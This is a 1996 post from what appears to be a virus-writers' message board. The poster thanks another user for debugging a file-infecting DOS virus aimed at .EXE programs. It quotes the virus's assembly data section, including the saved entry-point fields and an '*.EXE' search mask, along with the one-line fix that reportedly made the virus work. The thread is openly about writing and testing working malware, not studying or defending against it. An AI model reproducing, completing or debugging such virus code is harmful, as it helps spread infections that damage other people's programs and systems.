Re: EXE infector. Thank You!!


[ Follow Ups ] [ Post Followup ] [ The VBB Message Board ] [ FAQ ]

Posted by Char on August 05, 1996 at 20:12:43:

In Reply to: Re: EXE infector, whole code posted by The Nihilist on August 05, 1996 at 07:17:49:


: : db 0eah
: : ;------DATA AREA-----------------------------------------------------
: : ORG_IP DW ?
: : ORG_CS DW ?
: : ORG_SP DW ?
: : ORG_SS DW ?
: : EXE_MASK DB '*.EXE',0
: : CARRIER_IP DW ?
: : CARRIER_CS DW 0FFF0H
: : CARRIER_SP DW ?
: : CARRIER_SS DW 0FFF0H

: : V_END:

: : NEW_DTA DB 43 DUP (?)
: : HEADER DB 1AH DUP (?)

: : REAL_END:

: : END MAIN

: : If you have another PC for testing virii,
: : could you please 'copy and paste' this virus
: : and test it at once. If you do not have,
: : just read it please.
: : Thank You Very Much!

: : Char

: Ok, I found the error, all you forgot to do was to
: change your code in area to
: CARRIER_IP DW 0
: I tested your virus with that one change and it
: worked perfectly under DOS. Besides that one
: little error, your virus was fine.

: The Nihilist

Yeah!! My virus works! Thank you so much for
helping me to debug and test it!

Char


Follow Ups:



Post a Followup

Name:
E-Mail:

Subject:

Comments:

Optional Link URL:
Link Title:
Optional Image URL:


[ Follow Ups ] [ Post Followup ] [ The VBB Message Board ] [ FAQ ]